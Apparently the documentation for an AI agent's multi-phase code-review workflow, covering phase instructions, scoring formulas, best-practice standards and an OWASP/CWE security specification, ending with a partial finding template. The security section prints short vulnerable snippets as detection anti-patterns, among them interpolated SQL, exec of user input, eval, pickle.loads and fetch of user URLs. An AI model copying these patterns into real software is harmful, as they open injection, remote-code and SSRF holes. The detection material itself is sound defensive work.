"input": {
"inventory_path": ".code-review/inventory.json",
"files_analyzed": 57
},
"output": {
"findings_path": ".code-review/security-findings.json",
"total_findings": 24,
"critical_count": 3,
"high_count": 8
}
}
```
## Agent Instructions
```markdown
You are in Phase 2 of the Code Review workflow. Your task is to analyze code for security vulnerabilities.
**Instructions**:
1. Load file inventory from Phase 1
2. Focus on Critical + High priority files
3. Run security checks for:
- OWASP Top 10 vulnerabilities
- CWE Top 25 weaknesses
- Language-specific security patterns
4. Use smart_search with mode="ripgrep" for pattern matching
5. Use mcp__ace-tool__search_context for semantic security pattern discovery
6. Classify findings by severity (Critical/High/Medium/Low)
7. Generate security-findings.json and markdown report
8. Proceed to Phase 3 (Best Practices Review)
**Tools Available**:
- mcp__ccw_tools__smart_search (pattern search)
- mcp__ace-tool__search_context (semantic search)
- Read (read file content)
- Write (save findings and reports)
- Grep (targeted pattern matching)
**Output Requirements**:
- security-findings.json with detailed findings
- Security report in markdown format
- Each finding must include: file, line, severity, CWE, OWASP, fix recommendation
- State file for phase tracking
```
## Validation
Before proceeding to Phase 3:
- ✅ All Critical + High priority files analyzed
- ✅ Findings categorized by severity
- ✅ Each finding has fix recommendation
- ✅ CWE and OWASP mappings included
- ✅ Security report generated
- ✅ State saved
## Next Phase
**Phase 3: Best Practices Review** - Analyze code quality, performance, and maintainability issues.
# Phase 3: Best Practices Review
## Objective
Analyze code for best practices violations including code quality, performance issues, and maintainability concerns.
## Input
- **File Inventory**: From Phase 1 (`.code-review/inventory.json`)
- **Security Findings**: From Phase 2 (`.code-review/security-findings.json`)
- **User Arguments**:
- `--focus best-practices`: Best practices only mode
- `--check quality,performance,maintainability`: Specific areas to check
## Process
### Step 1: Code Quality Analysis
Check naming conventions, function complexity, code duplication, and dead code.
### Step 2: Performance Analysis
Detect N+1 queries, inefficient algorithms, and memory leaks.
### Step 3: Maintainability Analysis
Check documentation coverage, test coverage, and dependency management.
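Taken together, the three steps amount to one analysis pass per inventoried file. A minimal sketch (the `checks` helpers are placeholders, not an existing API):

```javascript
// One analysis pass per inventory file; the check helpers are placeholders
// for the detailed rules in the best-practices specification.
async function runBestPracticesPhase(inventory, checks) {
  const findings = [];
  for (const file of inventory.files) {
    const content = await checks.read(file.path);
    findings.push(
      ...checks.quality(content, file),        // Step 1: naming, complexity, duplication
      ...checks.performance(content, file),    // Step 2: N+1 queries, algorithms, leaks
      ...checks.maintainability(content, file) // Step 3: docs, tests, dependencies
    );
  }
  return findings;
}
```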
## Output
- best-practices-findings.json
- Markdown report with recommendations
## Next Phase
**Phase 4: Report Generation**
# Phase 4: Report Generation
## Objective
Consolidate security and best practices findings into a comprehensive, actionable code review report.
## Input
- **Security Findings**: `.code-review/security-findings.json`
- **Best Practices Findings**: `.code-review/best-practices-findings.json`
- **File Inventory**: `.code-review/inventory.json`
## Process
### Step 1: Load All Findings
```javascript
const securityFindings = JSON.parse(
await Read({ file_path: '.code-review/security-findings.json' })
);
const bestPracticesFindings = JSON.parse(
await Read({ file_path: '.code-review/best-practices-findings.json' })
);
const inventory = JSON.parse(
await Read({ file_path: '.code-review/inventory.json' })
);
```
### Step 2: Aggregate Statistics
```javascript
const stats = {
total_files_reviewed: inventory.total_files,
total_findings: securityFindings.total_findings + bestPracticesFindings.total_findings,
by_severity: {
critical: securityFindings.by_severity.critical,
high: securityFindings.by_severity.high + bestPracticesFindings.by_severity.high,
medium: securityFindings.by_severity.medium + bestPracticesFindings.by_severity.medium,
low: securityFindings.by_severity.low + bestPracticesFindings.by_severity.low,
},
by_category: {
security: securityFindings.total_findings,
code_quality: bestPracticesFindings.by_category.code_quality,
performance: bestPracticesFindings.by_category.performance,
maintainability: bestPracticesFindings.by_category.maintainability,
}
};
```
### Step 3: Generate Comprehensive Report
```markdown
# Comprehensive Code Review Report
**Generated**: {timestamp}
**Scope**: {scope}
**Files Reviewed**: {total_files}
**Total Findings**: {total_findings}
## Executive Summary
{Provide high-level overview of code health}
### Risk Assessment
{Calculate risk score based on findings}
### Compliance Status
{Map findings to compliance requirements}
## Detailed Findings
{Merge and organize security + best practices findings}
## Action Plan
{Prioritized list of fixes with effort estimates}
## Appendix
{Technical details, references, configuration}
```
### Step 4: Generate Fix Tracking Checklist
Create actionable checklist for developers:
```markdown
# Code Review Fix Checklist
## Critical Issues (Fix Immediately)
- [ ] [SEC-001] SQL Injection in src/auth/user-service.ts:145
- [ ] [SEC-002] Hardcoded JWT Secret in src/auth/jwt.ts:23
- [ ] [SEC-003] XSS Vulnerability in src/api/comments.ts:89
## High Priority Issues (Fix This Week)
- [ ] [SEC-004] Missing Authorization Check in src/api/admin.ts:34
- [ ] [BP-001] N+1 Query Pattern in src/api/orders.ts:45
...
```
### Step 5: Generate Metrics Dashboard
```markdown
## Code Health Metrics
### Security Score: 68/100
- Critical Issues: 3 (-30 points)
- High Issues: 8 (-2 points each)
### Code Quality Score: 75/100
- High Complexity Functions: 2
- Code Duplication: 5%
- Dead Code: 3 instances
### Performance Score: 82/100
- N+1 Queries: 3
- Inefficient Algorithms: 2
### Maintainability Score: 70/100
- Documentation Coverage: 65%
- Test Coverage: 72%
- Missing Tests: 5 files
```
## Output
### Main Report
Save to `.code-review/REPORT.md`:
- Executive summary
- Detailed findings (security + best practices)
- Action plan with priorities
- Metrics and scores
- References and compliance mapping
### Fix Checklist
Save to `.code-review/FIX-CHECKLIST.md`:
- Organized by severity
- Checkboxes for tracking
- File:line references
- Effort estimates
### JSON Summary
Save to `.code-review/summary.json`:
```json
{
"report_date": "2024-01-15T12:00:00Z",
"scope": "src/**/*",
"statistics": {
"total_files": 247,
"total_findings": 69,
"by_severity": { "critical": 3, "high": 13, "medium": 30, "low": 23 },
"by_category": {
"security": 24,
"code_quality": 18,
"performance": 12,
"maintainability": 15
}
},
"scores": {
"security": 68,
"code_quality": 75,
"performance": 82,
"maintainability": 70,
"overall": 74
},
"risk_level": "MEDIUM",
"action_required": true
}
```
## Report Template
Full report includes:
1. **Executive Summary**
- Overall code health
- Risk assessment
- Key recommendations
2. **Security Findings** (from Phase 2)
- Critical/High/Medium/Low
- OWASP/CWE mappings
- Fix recommendations with code examples
3. **Best Practices Findings** (from Phase 3)
- Code quality issues
- Performance concerns
- Maintainability gaps
4. **Metrics Dashboard**
- Security score
- Code quality score
- Performance score
- Maintainability score
5. **Action Plan**
- Immediate actions (critical)
- Short-term (1 week)
- Medium-term (1 month)
- Long-term (3 months)
6. **Compliance Impact**
- PCI DSS findings
- HIPAA findings
- GDPR findings
- SOC 2 findings
7. **Appendix**
- Full findings list
- Configuration used
- Tools and versions
- References
## State Management
```json
{
"phase": "04-report-generation",
"status": "completed",
"timestamp": "2024-01-15T12:00:00Z",
"input": {
"security_findings": ".code-review/security-findings.json",
"best_practices_findings": ".code-review/best-practices-findings.json"
},
"output": {
"report": ".code-review/REPORT.md",
"checklist": ".code-review/FIX-CHECKLIST.md",
"summary": ".code-review/summary.json"
}
}
```
## Agent Instructions
```markdown
You are in Phase 4 (FINAL) of the Code Review workflow. Generate comprehensive report.
**Instructions**:
1. Load security findings from Phase 2
2. Load best practices findings from Phase 3
3. Aggregate statistics and calculate scores
4. Generate comprehensive markdown report
5. Create fix tracking checklist
6. Generate JSON summary
7. Inform user of completion and output locations
**Tools Available**:
- Read (load findings)
- Write (save reports)
**Output Requirements**:
- REPORT.md (comprehensive markdown report)
- FIX-CHECKLIST.md (actionable checklist)
- summary.json (machine-readable summary)
- All files in .code-review/ directory
```
## Validation
- ✅ All findings consolidated
- ✅ Scores calculated
- ✅ Action plan generated
- ✅ Reports saved to .code-review/
- ✅ User notified of completion
## Completion
Code review complete! Outputs available in `.code-review/` directory.
# Best Practices Requirements Specification
## Code Quality Standards
### Naming Conventions
**TypeScript/JavaScript**:
- Classes/Interfaces: PascalCase (`UserService`, `IUserRepository`)
- Functions/Methods: camelCase (`getUserById`, `validateEmail`)
- Constants: UPPER_SNAKE_CASE (`MAX_RETRY_COUNT`, `API_BASE_URL`)
- Private properties: prefix with `_` or `#` (`_cache`, `#secretKey`)
**Python**:
- Classes: PascalCase (`UserService`, `DatabaseConnection`)
- Functions: snake_case (`get_user_by_id`, `validate_email`)
- Constants: UPPER_SNAKE_CASE (`MAX_RETRY_COUNT`)
- Private: prefix with `_` (`_internal_cache`)
**Java**:
- Classes/Interfaces: PascalCase (`UserService`, `IUserRepository`)
- Methods: camelCase (`getUserById`, `validateEmail`)
- Constants: UPPER_SNAKE_CASE (`MAX_RETRY_COUNT`)
- Packages: lowercase (`com.example.service`)
### Function Complexity
**Cyclomatic Complexity Thresholds**:
- **Low**: 1-5 (simple functions, easy to test)
- **Medium**: 6-10 (acceptable, well-structured)
- **High**: 11-20 (needs refactoring)
- **Very High**: 21+ (critical, must refactor)
**Calculation**:
```
Complexity = 1 (base)
+ count(if)
+ count(else if)
+ count(while)
+ count(for)
+ count(case)
+ count(catch)
+ count(&&)
+ count(||)
+ count(? :)
```
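As a rough textual implementation of that formula (a sketch only: real analyzers count decision points on the AST, so regex counting can over-count keywords that appear inside strings or comments):

```javascript
// Approximate cyclomatic complexity by counting decision points in source text.
// "else if" is covered by the "if (" pattern; the ternary pattern is crude
// and written to avoid matching optional chaining ("?.").
function approximateComplexity(source) {
  const decisionPatterns = [
    /\bif\s*\(/g,
    /\bwhile\s*\(/g,
    /\bfor\s*\(/g,
    /\bcase\s+/g,
    /\bcatch\s*\(/g,
    /&&/g,
    /\|\|/g,
    /\?[^.:]*:/g,
  ];
  let complexity = 1; // base path
  for (const pattern of decisionPatterns) {
    const matches = source.match(pattern);
    complexity += matches ? matches.length : 0;
  }
  return complexity;
}
```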
### Code Duplication
**Thresholds**:
- **Acceptable**: < 3% duplication
- **Warning**: 3-5% duplication
- **Critical**: > 5% duplication
**Detection**:
- Minimum block size: 5 lines
- Similarity threshold: 85%
- Ignore: Comments, imports, trivial getters/setters
### Dead Code Detection
**Targets**:
- Unused imports
- Unused variables/functions (not exported)
- Unreachable code (after return/throw)
- Commented-out code blocks (> 5 lines)
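A minimal unused-import detector along these lines (an illustrative sketch; it misses namespace imports, re-exports, and type-only references that AST-based tools handle):

```javascript
// Flag named imports that never appear again in the file body.
// A heuristic sketch: real dead-code tools resolve bindings via the AST.
function findUnusedImports(source) {
  const unused = [];
  const importRe = /import\s+\{([^}]+)\}\s+from\s+['"][^'"]+['"]/g;
  for (const match of source.matchAll(importRe)) {
    // Search the file with this import statement removed
    const body = source.slice(0, match.index) + source.slice(match.index + match[0].length);
    for (const raw of match[1].split(',')) {
      const name = raw.trim().split(/\s+as\s+/).pop().trim();
      if (name && !new RegExp(`\\b${name}\\b`).test(body)) {
        unused.push(name);
      }
    }
  }
  return unused;
}
```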
## Performance Standards
### N+1 Query Prevention
**Anti-patterns**:
```javascript
// ❌ N+1 Query
for (const order of orders) {
const user = await User.findById(order.userId);
}
// ✅ Batch Query
const userIds = orders.map(o => o.userId);
const users = await User.findByIds(userIds);
```
### Algorithm Efficiency
**Common Issues**:
- Nested loops (O(n²)) when O(n) possible
- Array.indexOf in loop → use Set.has()
- Array.filter().length → use Array.some()
- Multiple array iterations → combine into one pass
**Acceptable Complexity**:
- **O(1)**: Ideal for lookups
- **O(log n)**: Good for search
- **O(n)**: Acceptable for linear scan
- **O(n log n)**: Acceptable for sorting
- **O(n²)**: Avoid if possible, document if necessary
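The `Array.indexOf`-in-loop item above as a before/after sketch (function names are illustrative):

```javascript
// ❌ O(n·m): indexOf rescans allowedIds for every order
function filterAllowedSlow(orders, allowedIds) {
  return orders.filter(order => allowedIds.indexOf(order.userId) !== -1);
}

// ✅ O(n + m): build the Set once, then each lookup is O(1)
function filterAllowedFast(orders, allowedIds) {
  const allowed = new Set(allowedIds);
  return orders.filter(order => allowed.has(order.userId));
}
```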
### Memory Leak Prevention
**Common Issues**:
- Event listeners without cleanup
- setInterval without clearInterval
- Global variable accumulation
- Circular references
- Large array/object allocations
**Patterns**:
```javascript
// ❌ Memory Leak
element.addEventListener('click', handler);
// No cleanup
// ✅ Proper Cleanup
useEffect(() => {
element.addEventListener('click', handler);
return () => element.removeEventListener('click', handler);
}, []);
```
### Resource Cleanup
**Required Cleanup**:
- Database connections
- File handles
- Network sockets
- Timers (setTimeout, setInterval)
- Event listeners
## Maintainability Standards
### Documentation Requirements
**Required for**:
- All exported functions/classes
- Public APIs
- Complex algorithms
- Non-obvious business logic
**JSDoc Format**:
```javascript
/**
* Validates user credentials and generates JWT token
*
* @param {string} username - User's username or email
* @param {string} password - Plain text password
* @returns {Promise<{token: string, expiresAt: Date}>} JWT token and expiration
* @throws {AuthenticationError} If credentials are invalid
*
* @example
* const {token} = await authenticateUser('john@example.com', 'secret123');
*/
async function authenticateUser(username, password) {
// ...
}
```
**Coverage Targets**:
- Critical modules: 100%
- High priority: 90%
- Medium priority: 70%
- Low priority: 50%
### Test Coverage Requirements
**Coverage Targets**:
- Unit tests: 80% line coverage
- Integration tests: Key workflows covered
- E2E tests: Critical user paths covered
**Required Tests**:
- All exported functions
- All public methods
- Error handling paths
- Edge cases
**Test File Convention**:
```
src/auth/login.ts
→ src/auth/login.test.ts (unit)
→ src/auth/login.integration.test.ts (integration)
```
### Dependency Management
**Best Practices**:
- Pin major versions (`"^1.2.3"` not `"*"`)
- Avoid 0.x versions in production
- Regular security audits (npm audit, snyk)
- Keep dependencies up-to-date
- Minimize dependency count
**Version Pinning**:
```json
{
"dependencies": {
"express": "^4.18.0", // ✅ Pinned major version
"lodash": "*", // ❌ Wildcard
"legacy-lib": "^0.5.0" // ⚠️ Unstable 0.x
}
}
```
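A small check for the risky specifiers shown above (a sketch; npm's full semver grammar, with ranges, tags, and git URLs, is richer than this):

```javascript
// Flag wildcard and unstable 0.x specifiers in a parsed package.json
// "dependencies" object. Heuristic only; not a full semver parser.
function auditDependencyVersions(dependencies) {
  const findings = [];
  for (const [name, version] of Object.entries(dependencies)) {
    if (version === '*' || version === 'latest') {
      findings.push({ name, version, issue: 'wildcard version' });
    } else if (/^[\^~]?0\./.test(version)) {
      findings.push({ name, version, issue: 'unstable 0.x version' });
    }
  }
  return findings;
}
```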
### Magic Numbers
**Definition**: Numeric literals without clear meaning
**Anti-patterns**:
```javascript
// ❌ Magic numbers
if (user.age > 18) { }
setTimeout(() => {}, 5000);
buffer = new Array(1048576);
// ✅ Named constants
const LEGAL_AGE = 18;
const RETRY_DELAY_MS = 5000;
const BUFFER_SIZE_1MB = 1024 * 1024;
if (user.age > LEGAL_AGE) { }
setTimeout(() => {}, RETRY_DELAY_MS);
buffer = new Array(BUFFER_SIZE_1MB);
```
**Exceptions** (acceptable magic numbers):
- 0, 1, -1 (common values)
- 100, 1000 (obvious scaling factors in context)
- HTTP status codes (200, 404, 500)
## Error Handling Standards
### Required Error Handling
**Categories**:
- Network errors (timeout, connection failure)
- Database errors (query failure, constraint violation)
- Validation errors (invalid input)
- Authentication/Authorization errors
**Anti-patterns**:
```javascript
// ❌ Silent failure
try {
await saveUser(user);
} catch (err) {
// Empty catch
}
// ❌ Generic catch
try {
await processPayment(order);
} catch (err) {
console.log('Error'); // No details
}
// ✅ Proper handling
try {
await processPayment(order);
} catch (err) {
logger.error('Payment processing failed', { orderId: order.id, error: err });
throw new PaymentError('Failed to process payment', { cause: err });
}
```
### Logging Standards
**Required Logs**:
- Authentication attempts (success/failure)
- Authorization failures
- Data modifications (create/update/delete)
- External API calls
- Errors and exceptions
**Log Levels**:
- **ERROR**: System errors, exceptions
- **WARN**: Recoverable issues, deprecations
- **INFO**: Business events, state changes
- **DEBUG**: Detailed troubleshooting info
**Sensitive Data**:
- Never log: passwords, tokens, credit cards, SSNs
- Hash/mask: emails, IPs, usernames (in production)
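A masking helper along these lines can be applied before any log call (the field names and masking rules are illustrative assumptions, not a standard):

```javascript
// Redact or mask sensitive fields before logging.
// The key list and the email-masking rule are illustrative assumptions.
const REDACT_KEYS = /password|secret|token|key|ssn|card/i;

function sanitizeForLog(obj) {
  const out = {};
  for (const [k, v] of Object.entries(obj)) {
    if (REDACT_KEYS.test(k)) {
      out[k] = '[REDACTED]';
    } else if (k === 'email' && typeof v === 'string') {
      out[k] = v.replace(/^(.).*(@.*)$/, '$1***$2'); // keep first char and domain
    } else {
      out[k] = v;
    }
  }
  return out;
}
```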
## Code Structure Standards
### File Organization
**Max File Size**: 300 lines (excluding tests)
**Max Function Size**: 50 lines
**Module Structure**:
```
module/
├── index.ts # Public exports
├── types.ts # Type definitions
├── constants.ts # Constants
├── utils.ts # Utilities
├── service.ts # Business logic
└── service.test.ts # Tests
```
### Import Organization
**Order**:
1. External dependencies
2. Internal modules (absolute imports)
3. Relative imports
4. Type imports (TypeScript)
```typescript
// ✅ Organized imports
import express from 'express';
import { Logger } from 'winston';
import { UserService } from '@/services/user';
import { config } from '@/config';
import { validateEmail } from './utils';
import { UserRepository } from './repository';
import type { User, UserCreateInput } from './types';
```
## Scoring System
### Overall Score Calculation
```
Overall Score = (
Security Score × 0.4 +
Code Quality Score × 0.25 +
Performance Score × 0.2 +
Maintainability Score × 0.15
)
Security = 100 - (Critical × 30 + High × 2 + Medium × 0.5)
Code Quality = 100 - (violations / total_checks × 100)
Performance = 100 - (issues / potential_issues × 100)
Maintainability = (doc_coverage × 0.4 + test_coverage × 0.4 + dependency_health × 0.2)
```
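The formulas translate directly to code. A sketch (clamping to the 0-100 range is an added assumption, since the raw formulas can go negative):

```javascript
// Score calculation mirroring the weighted formulas above.
const clamp = s => Math.max(0, Math.min(100, s));

function securityScore({ critical = 0, high = 0, medium = 0 }) {
  return clamp(100 - (critical * 30 + high * 2 + medium * 0.5));
}

function overallScore({ security, codeQuality, performance, maintainability }) {
  return Math.round(
    security * 0.4 +
    codeQuality * 0.25 +
    performance * 0.2 +
    maintainability * 0.15
  );
}
```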
### Risk Levels
- **LOW**: Score 90-100
- **MEDIUM**: Score 70-89
- **HIGH**: Score 50-69
- **CRITICAL**: Score < 50
# Quality Standards
## Overall Quality Metrics
### Quality Score Formula
```
Overall Quality = (
Correctness × 0.30 +
Security × 0.25 +
Maintainability × 0.20 +
Performance × 0.15 +
Documentation × 0.10
)
```
### Score Ranges
| Range | Grade | Description |
|-------|-------|-------------|
| 90-100 | A | Excellent - Production ready |
| 80-89 | B | Good - Minor improvements needed |
| 70-79 | C | Acceptable - Some issues to address |
| 60-69 | D | Poor - Significant improvements required |
| 0-59 | F | Failing - Major issues, not production ready |
## Review Completeness
### Mandatory Checks
**Security**:
- ✅ OWASP Top 10 coverage
- ✅ CWE Top 25 coverage
- ✅ Language-specific security patterns
- ✅ Dependency vulnerability scan
**Code Quality**:
- ✅ Naming convention compliance
- ✅ Complexity analysis
- ✅ Code duplication detection
- ✅ Dead code identification
**Performance**:
- ✅ N+1 query detection
- ✅ Algorithm efficiency check
- ✅ Memory leak detection
- ✅ Resource cleanup verification
**Maintainability**:
- ✅ Documentation coverage
- ✅ Test coverage analysis
- ✅ Dependency health check
- ✅ Error handling review
## Reporting Standards
### Finding Requirements
Each finding must include:
- **Unique ID**: SEC-001, BP-001, etc.
- **Type**: Specific issue type (sql-injection, high-complexity, etc.)
- **Severity**: Critical, High, Medium, Low
- **Location**: File path and line number
- **Code Snippet**: Vulnerable/problematic code
- **Message**: Clear description of the issue
- **Recommendation**: Specific fix guidance
- **Example**: Before/after code example
### Report Structure
**Executive Summary**:
- High-level overview
- Risk assessment
- Key statistics
- Compliance status
**Detailed Findings**:
- Organized by severity
- Grouped by category
- Full details for each finding
**Action Plan**:
- Prioritized fix list
- Effort estimates
- Timeline recommendations
**Metrics Dashboard**:
- Quality scores
- Trend analysis (if historical data)
- Compliance status
**Appendix**:
- Full findings list
- Configuration details
- Tool versions
- References
## Output File Standards
### File Naming
```
.code-review/
├── inventory.json # File inventory
├── security-findings.json # Security findings
├── best-practices-findings.json # Best practices findings
├── summary.json # Summary statistics
├── REPORT.md # Main report
├── FIX-CHECKLIST.md # Action checklist
└── state.json # Session state
```
### JSON Schema
**Finding Schema**:
```json
{
"id": "string",
"type": "string",
"category": "security|code_quality|performance|maintainability",
"severity": "critical|high|medium|low",
"file": "string",
"line": "number",
"column": "number",
"code": "string",
"message": "string",
"recommendation": {
"description": "string",
"fix_example": "string"
},
"references": ["string"],
"cwe": "string (optional)",
"owasp": "string (optional)"
}
```
## Validation Requirements
### Phase Completion Criteria
**Phase 1 (Code Discovery)**:
- ✅ At least 1 file discovered
- ✅ Files categorized by priority
- ✅ Metadata extracted
- ✅ Inventory JSON created
**Phase 2 (Security Analysis)**:
- ✅ All critical/high priority files analyzed
- ✅ Findings have severity classification
- ✅ CWE/OWASP mappings included
- ✅ Fix recommendations provided
**Phase 3 (Best Practices)**:
- ✅ Code quality checks completed
- ✅ Performance analysis done
- ✅ Maintainability assessed
- ✅ Recommendations provided
**Phase 4 (Report Generation)**:
- ✅ All findings consolidated
- ✅ Scores calculated
- ✅ Reports generated
- ✅ Checklist created
## Skill Execution Standards
### Performance Targets
- **Phase 1**: < 30 seconds per 1000 files
- **Phase 2**: < 60 seconds per 100 files (security)
- **Phase 3**: < 60 seconds per 100 files (best practices)
- **Phase 4**: < 10 seconds (report generation)
### Resource Limits
- **Memory**: < 2GB for projects with 1000+ files
- **CPU**: Efficient pattern matching (minimize regex complexity)
- **Disk**: Use streaming for large files (> 10MB)
### Error Handling
**Graceful Degradation**:
- If tool unavailable: Skip check, note in report
- If file unreadable: Log warning, continue with others
- If analysis fails: Report error, continue with next file
**User Notification**:
- Progress updates every 10% completion
- Clear error messages with troubleshooting steps
- Final summary with metrics and file locations
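The degradation rules above reduce to per-file error isolation. A sketch (`analyzeFile` and `logger` stand in for the phase's real helpers):

```javascript
// Per-file error isolation: one unreadable or failing file never aborts the scan.
// Skipped files are collected so the final report can note them.
async function scanAll(files, analyzeFile, logger) {
  const findings = [];
  const skipped = [];
  for (const file of files) {
    try {
      findings.push(...await analyzeFile(file));
    } catch (err) {
      skipped.push({ file, reason: err.message });
      logger.warn(`Skipping ${file}: ${err.message}`);
    }
  }
  return { findings, skipped };
}
```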
## Integration Standards
### Git Integration
**Pre-commit Hook**:
```bash
#!/bin/bash
ccw run code-reviewer --scope staged --severity critical,high
exit $? # Block commit if critical/high issues found
```
**PR Comments**:
- Automatic review comments on changed lines
- Summary comment with overall findings
- Status check (pass/fail based on threshold)
### CI/CD Integration
**Requirements**:
- Exit code 0 if no critical/high issues
- Exit code 1 if blocking issues found
- JSON output for parsing
- Configurable severity threshold
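The exit-code contract can be derived from `summary.json`. A sketch (the configurable severity list is an assumption about how the threshold would be exposed):

```javascript
// Map summary.json statistics to a CI exit code:
// 0 when no blocking findings, 1 otherwise.
function ciExitCode(summary, blockingSeverities = ['critical', 'high']) {
  const blocking = blockingSeverities
    .reduce((n, sev) => n + (summary.statistics.by_severity[sev] || 0), 0);
  return blocking > 0 ? 1 : 0;
}
```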
### IDE Integration
**LSP Support** (future):
- Real-time security/quality feedback
- Inline fix suggestions
- Quick actions for common fixes
## Compliance Mapping
### Supported Standards
**PCI DSS**:
- Requirement 6.5: Common coding vulnerabilities
- Map findings to specific requirements
**HIPAA**:
- Technical safeguards
- Map data exposure findings
**GDPR**:
- Data protection by design
- Map sensitive data handling
**SOC 2**:
- Security controls
- Map access control findings
### Compliance Reports
Generate compliance-specific reports:
```
.code-review/compliance/
├── pci-dss-report.md
├── hipaa-report.md
├── gdpr-report.md
└── soc2-report.md
```
# Security Requirements Specification
## OWASP Top 10 Coverage
### A01:2021 - Broken Access Control
**Checks**:
- Missing authorization checks on protected routes
- Insecure direct object references (IDOR)
- Path traversal vulnerabilities
- Missing CSRF protection
- Elevation of privilege
**Patterns**:
```javascript
// Missing auth middleware
router.get('/admin/*', handler); // ❌ No auth check
// Insecure direct object reference
router.get('/user/:id', async (req, res) => {
const user = await User.findById(req.params.id); // ❌ No ownership check
res.json(user);
});
```
### A02:2021 - Cryptographic Failures
**Checks**:
- Sensitive data transmitted without encryption
- Weak cryptographic algorithms (MD5, SHA1)
- Hardcoded secrets/keys
- Insecure random number generation
**Patterns**:
```javascript
// Weak hashing
const hash = crypto.createHash('md5').update(password); // ❌ MD5 is weak
// Hardcoded secret
const token = jwt.sign(payload, 'secret123'); // ❌ Hardcoded secret
```
### A03:2021 - Injection
**Checks**:
- SQL injection
- NoSQL injection
- Command injection
- LDAP injection
- XPath injection
**Patterns**:
```javascript
// SQL injection
const query = `SELECT * FROM users WHERE id = ${userId}`; // ❌
// Command injection
exec(`git clone ${userRepo}`); // ❌
```
### A04:2021 - Insecure Design
**Checks**:
- Missing rate limiting
- Lack of input validation
- Business logic flaws
- Missing security requirements
### A05:2021 - Security Misconfiguration
**Checks**:
- Default credentials
- Overly permissive CORS
- Verbose error messages
- Unnecessary features enabled
- Missing security headers
**Patterns**:
```javascript
// Overly permissive CORS
app.use(cors({ origin: '*' })); // ❌
// Verbose error
res.status(500).json({ error: err.stack }); // ❌
```
### A06:2021 - Vulnerable and Outdated Components
**Checks**:
- Dependencies with known vulnerabilities
- Unmaintained dependencies
- Using deprecated APIs
### A07:2021 - Identification and Authentication Failures
**Checks**:
- Weak password requirements
- Missing brute-force protection
- Exposed session IDs
- Weak JWT implementation
**Patterns**:
```javascript
// Weak bcrypt rounds
bcrypt.hash(password, 4); // ❌ Too low (min: 10)
// Session ID in URL
res.redirect(`/dashboard?sessionId=${sessionId}`); // ❌
```
### A08:2021 - Software and Data Integrity Failures
**Checks**:
- Insecure deserialization
- Unsigned/unverified updates
- CI/CD pipeline vulnerabilities
**Patterns**:
```javascript
// Insecure deserialization
const obj = eval(userInput); // ❌
// Pickle vulnerability (Python)
data = pickle.loads(untrusted_data)  # ❌
```
### A09:2021 - Security Logging and Monitoring Failures
**Checks**:
- Missing audit logs
- Sensitive data in logs
- Insufficient monitoring
**Patterns**:
```javascript
// Password in logs
console.log(`Login attempt: ${username}:${password}`); // ❌
```
### A10:2021 - Server-Side Request Forgery (SSRF)
**Checks**:
- Unvalidated URLs in requests
- Internal network access
- Cloud metadata exposure
**Patterns**:
```javascript
// SSRF vulnerability
const response = await fetch(userProvidedUrl); // ❌
```
## CWE Top 25 Coverage
### CWE-79: Cross-site Scripting (XSS)
**Patterns**:
```javascript
element.innerHTML = userInput; // ❌
document.write(userInput); // ❌
```
### CWE-89: SQL Injection
**Patterns**:
```javascript
query = `SELECT * FROM users WHERE name = '${name}'`; // ❌
```
### CWE-20: Improper Input Validation
**Checks**:
- Missing input sanitization
- No input length limits
- Unvalidated file uploads
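**Patterns** (illustrative heuristics; these are assumptions for this skill, not part of the CWE text):

```javascript
// Heuristic patterns for unvalidated request input
const inputValidationPatterns = [
  /JSON\.parse\(req\.(body|query|params)/, // parsing raw request data directly
  /\.save\(req\.body\)/,                   // persisting the request body unchecked
  /parseInt\(req\.(query|params)\.\w+\)/,  // numeric coercion without bounds check
];
```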
### CWE-78: OS Command Injection
**Patterns**:
```javascript
exec(`ping ${userInput}`); // ❌
```
### CWE-190: Integer Overflow
**Checks**:
- Large number operations without bounds checking
- Array allocation with user-controlled size
## Language-Specific Security Rules
### TypeScript/JavaScript
- Prototype pollution
- eval() usage
- Unsafe regex (ReDoS)
- require() with dynamic input
### Python
- pickle vulnerabilities
- yaml.unsafe_load()
- SQL injection in SQLAlchemy
- Command injection in subprocess
### Java
- Deserialization vulnerabilities
- XXE in XML parsers
- Path traversal
- SQL injection in JDBC
### Go
- Race conditions
- SQL injection
- Path traversal
- Weak cryptography
## Severity Classification
### Critical
- Remote code execution
- SQL injection with write access
- Authentication bypass
- Hardcoded credentials in production
### High
- XSS in sensitive contexts
- Missing authorization checks
- Sensitive data exposure
- Insecure cryptography
### Medium
- Missing rate limiting
- Weak password policy
- Security misconfiguration
- Information disclosure
### Low
- Missing security headers
- Verbose error messages
- Outdated dependencies (no known exploits)


@@ -1,234 +0,0 @@
# Best Practice Finding Template
Use this template for documenting code quality, performance, and maintainability issues.
## Finding Structure
```json
{
"id": "BP-{number}",
"type": "{issue-type}",
"category": "{code_quality|performance|maintainability}",
"severity": "{high|medium|low}",
"file": "{file-path}",
"line": {line-number},
"function": "{function-name}",
"message": "{clear-description}",
"recommendation": {
"description": "{how-to-fix}",
"example": "{corrected-code}"
}
}
```
## Markdown Template
```markdown
### 🟠 [BP-{number}] {Issue Title}
**File**: `{file-path}:{line}`
**Category**: {Code Quality|Performance|Maintainability}
**Issue**: {Detailed explanation of the problem}
**Current Code**:
\`\`\`{language}
{problematic-code}
\`\`\`
**Recommended Fix**:
\`\`\`{language}
{improved-code-with-comments}
\`\`\`
**Impact**: {Why this matters - readability, performance, maintainability}
---
```
## Example: High Complexity
```markdown
### 🟠 [BP-001] High Cyclomatic Complexity
**File**: `src/utils/validator.ts:78`
**Category**: Code Quality
**Function**: `validateUserInput`
**Complexity**: 15 (threshold: 10)
**Issue**: Function has 15 decision points, making it difficult to test and maintain.
**Current Code**:
\`\`\`typescript
function validateUserInput(input) {
if (!input) return false;
if (!input.email) return false;
if (!input.email.includes('@')) return false;
if (input.email.length > 255) return false;
// ... 11 more conditions
}
\`\`\`
**Recommended Fix**:
\`\`\`typescript
// Extract validation rules
const validationRules = {
email: (email) => email && email.includes('@') && email.length <= 255,
password: (pwd) => pwd && pwd.length >= 8 && /[A-Z]/.test(pwd),
username: (name) => name && /^[a-zA-Z0-9_]+$/.test(name),
};
// Simplified validator
function validateUserInput(input) {
return Object.entries(validationRules).every(([field, validate]) =>
validate(input[field])
);
}
\`\`\`
**Impact**: Reduces complexity from 15 to 3, improves testability, and makes validation rules reusable.
---
```
## Example: N+1 Query
```markdown
### 🟠 [BP-002] N+1 Query Pattern
**File**: `src/api/orders.ts:45`
**Category**: Performance
**Issue**: Database query executed inside loop, causing N+1 queries problem. For 100 orders, this creates 101 database queries instead of 2.
